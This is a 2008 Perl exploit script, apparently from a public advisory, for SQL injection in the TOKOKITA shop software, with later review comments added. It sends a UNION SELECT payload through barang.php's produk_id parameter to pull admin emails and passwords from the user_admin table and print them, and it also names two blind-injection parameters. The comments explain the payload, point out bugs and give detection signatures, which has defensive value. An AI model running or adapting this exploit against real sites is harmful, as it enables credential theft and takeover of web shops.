
# Title : TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit
# Published : 2008-06-24
# Author : k1tk4t


#!/usr/bin/perl
# k1tk4t Public Security Advisory
# ////////////////////////////////////////////////////////////
# TOKOKITA Multiple Remote SQL Injection 
# Demosite	: http://www.tokokita.net/toko/
# Vendor	: http://www.tokokita.com/
# Kutu		: 1. catlist.php?cat_id=[Blind SQLi]
#		  2. catlist_detail.php?cat_id=[Blind SQLi]
#	          3. barang.php?produk_id=[SQLi]
# Terimakasih untuk ;
# str0ke,DNX,n0c0py,L41n,
# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa],
# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] 
use LWP::UserAgent;

# Usage banner: printed, then the script exits, when the second positional
# argument (the application path) is missing.  NOTE(review): the bare "n"
# at the start of every string below is almost certainly a "\n" whose
# backslash was lost when the listing was published; as written, the script
# prints literal "n" characters instead of newlines.
if ( !$ARGV[1] ) {
	print "n //////////////////////////////////////////////////////////////////";
	print "n //                      ..::> k1tk4t <::..                      //";
	print "n // TOKOKITA (barang.php produk_id) Remote SQL Injection Exploit //";
	print "n //////////////////////////////////////////////////////////////////";
	print "n[!] ";
	# "Penggunaan" = usage, "Contoh" = example (Indonesian).
	print "n[!] Penggunaan : perl tokokita.pl [Site] [Path]";
	print "n[!] Contoh     : perl tokokita.pl localhost /toko/";
	print "n[!] ";
	print "n";
	exit;
}
# Positional arguments: target host name and the application's base path.
# The file enables neither strict nor warnings, so these are unchecked
# package globals.
$site   = $ARGV[0];
$path   = $ARGV[1];
# The UNION SELECT payload appended to the produk_id parameter.  The hex
# literals are ASCII marker strings (0x6b3174 = "k1t", 0x316e = "1n",
# 0x6b3474 = "k4t", 0x307574 = "0ut") wrapped around the email and password
# columns of the user_admin table; the regexes further down search the
# response body for exactly these markers.  From a defender's side the
# "produk_id=-9+union+select" request and the "k1t"/"k4t" markers in a
# response body are the distinctive signatures of this tool.
$sqlinj = "union+
select+
null,
null,
null,
concat(0x6b3174,email,0x316e),
null,
concat(0x6b3474,password,0x307574),
null,
null,
null,
null,
null+
from+
user_admin/*";    
# Full request URL: plain http, host + path from the command line, a fixed
# id value of -9, then the payload.  The embedded newlines in $sqlinj are
# sent as-is; LWP is left to encode them.
$expl = "http://" . $site . $path . "barang.php?produk_id=-9+"
. $sqlinj;
# Indirect-object syntax; equivalent to LWP::UserAgent->new.
$www  = new LWP::UserAgent;
# "Injeksi SQL" = SQL injection.
print "nn [!] Injeksi SQL n";
# get() always returns an HTTP::Response object, even for transport or HTTP
# errors, so the `or err()` branch cannot be reached -- which is just as
# well, because err() is not defined anywhere in this file.  The response
# status is never examined; only the body is.
$res = $www->get($expl) or err ();
$hasil = $res->content;
# Success is inferred purely from the first marker pair appearing in the body.
if ( $hasil =~ /k1t(.*?)1n/ ) {
	print "n [+] Username      : $1";
	# Comma expression: the second match and the print are one statement.
	# If the second regex does not match, $1 still holds the capture from
	# the first (successful) match, so the "Password" line would silently
	# repeat the username.
	$hasil =~ /k4t(.*?)0ut/, print "n [+] Password      : $1";
	print "nn";
} 
else {
	# "Exploit gagal" = exploit failed.
	print "n [-] Exploit gagal ;)";
	exit();
}
